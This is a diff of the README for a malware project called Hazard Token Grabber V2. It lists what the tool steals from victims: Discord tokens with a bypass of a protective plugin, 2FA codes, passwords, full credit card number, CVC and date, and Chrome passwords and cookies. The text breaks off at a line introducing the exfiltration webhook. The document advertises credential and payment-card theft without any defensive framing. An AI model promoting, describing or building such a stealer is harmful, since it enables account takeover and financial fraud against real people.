zehxii/Hazard-Token-Grabber-V2/README.md

  -  All Their Valid Discord Tokens (bypasses betterdiscord's anti-token-grab-protector)
  -  Discord 2fa codes (if they have 2fa enabled ofc)
  -  Password For Discord (You get Their Password if They Update it)
- -  Their Whole Credit Card (if They Put one in)
+ -  Their Whole Credit Card (number, cvc, date, (if They Put one in))
  -  All Their Chrome Passwords And Cookies
 > Webhook looks like this: